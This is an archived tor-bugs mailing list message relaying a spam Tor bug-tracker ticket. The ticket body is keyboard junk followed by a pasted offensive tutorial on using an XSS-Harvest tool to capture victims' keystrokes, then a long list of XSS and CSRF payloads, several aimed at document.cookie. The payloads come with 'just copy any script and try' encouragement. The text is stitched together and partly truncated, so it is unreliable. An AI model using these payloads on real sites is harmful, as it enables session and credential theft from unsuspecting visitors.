[tor-bugs] #23014 [- Select a component]: manish

Tor Bug Tracker & Wiki blackhole at torproject.org
Sun Jul 23 06:09:46 UTC 2017


#23014: manish
--------------------------------------+--------------------------------
     Reporter:  manishhacks8          |      Owner:
         Type:  enhancement           |     Status:  new
     Priority:  Medium                |  Milestone:  Tor: 0.3.1.x-final
    Component:  - Select a component  |    Version:
     Severity:  Normal                |   Keywords:
Actual Points:                        |  Parent ID:
       Points:                        |   Reviewer:
      Sponsor:                        |
--------------------------------------+--------------------------------
 jhflkdsfnasfa d* Server console displays real-time data received (due to
 multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid
 confusion).
 * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation
 to stored XSS only in most cases), FF5, Chrome and various mobile browsers
 (Safari and Android). Please let me know your success with other browsers.
 * Overcomes browser oddities, such as Internet Explorer throttling
 requests to the same URL when exfiltrating keystrokes.

 How to Exploit XSS with XSS-Harvest?

 Identify a page vulnerable to XSS (reflected or persistent will be fine –
 unless the victim is running IE9 or another plugin such as NoScript).

 Understand the markup of the page. You should be looking to insert
 syntactically correct <script></script> tags in to the source of the
 vulnerable page. Most attackers will insert something like
 ‘<script>alert(1)</script>’ at this stage to ensure the page is actually
 vulnerable.

 Start the XSS-Harvest server as root if you wish to bind to a TCP port <
 1024 (default port is 80), or as a limited user on a port > 1024 using the
 -p option. To start the server you must instruct it to listen with the -l
 option.

 Insert the following ‘injection string’ into the vulnerable page:

 <script src=”>

 This will return the client-side JavaScript to the victim, indicated by
 the ‘i’ in the URL.
 Entice visitors to the infected page (or to follow a link in the case of
 reflected XSS).
 Watch your victims roll in – a new history file will be created for each
 new victim.
 To use of the redress function, start the server with the -r parameter:

 ./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

 Basic dependencies:
 HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std,
 Net::Server::PreFork

 Download XSS-Harvest

 –> New:- Advance Scripts To Find XSS Vulnerabilities In Websites.
 Just Copy any script and try..
 To Redirect exploit code:

 ';redirecturl='javascript:alert("XSS")
 ';redirecturl='http://google.com/'

 Now for XSS
 Example: www.xyz.com?q="XSS Script"

     "/>alert("Xss:Priyanshu")
     "/></script><script>alert(/XSS : Priyanshu/)</script>

 <body onload=alert(1)>
 "<body onload="alert('XSS by Priyanshu')">

 "><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>

 <body onload=document.getElementById("xsrf").submit()>

 <a
 href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(1)>">X</a

 <a
 href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(document.cookie)>">X</a

     http://test.com<script>alert(document.domain)</script>
     http://test.com<script>alert(document.cookie)</script>

 <img src=x onerror=alert(document.domain)>

 x"></script><img src=x onerror=alert(1)>

 q=" onclick="alert(/XSS/)

 "><iframe src='javascript:prompt(/XSS/);'>

 <iframe src="http://google.com"></iframe>

 "><iframe src=a onload=alert('XSS')<

 </script><script>alert(document.cookie)</script>

 <xss>alert('xss')</xss>

 <iframe src="http://google.com"></iframe>

 DOM Based XSS Scripts

     /default.aspx#"><img src=x onerror=prompt('XSS');>
     /default.aspx#"><img src=x onerror=prompt('0');>

 <img src=x onerror=prompt(1);> by ">

 “><img src=x onerror=prompt(0)>.txt.jpg

 “><img src=x onerror=alert(document.cookie)>

 "><img src=x onerror=prompt(1);>

 "><script>alert('XSS')</script>

 id=abc"><Script>alert(/xss/)</SCRIPT>

 "><img src=" " onMouseover=prompt(/xss/);>

 Default.aspx/" onmouseout="confirm(1)'x="

 For More Script Coding Of XSS Visit ha.ckers.org and Brute.

--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/23014>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online


More information about the tor-bugs mailing list